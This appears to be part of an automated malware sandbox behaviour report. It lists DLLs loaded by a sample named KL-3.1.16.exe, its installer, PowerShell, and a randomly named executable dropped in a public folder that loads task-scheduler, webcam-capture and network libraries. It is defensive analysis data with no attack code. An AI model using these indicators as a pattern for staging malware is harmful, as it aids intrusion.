Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: lua5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: wininet.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: taskschd.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: xmllite.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: napinsp.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: wshbth.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: nlaapi.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: winrnr.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: devenum.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: devobj.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: msasn1.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: msdmo.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
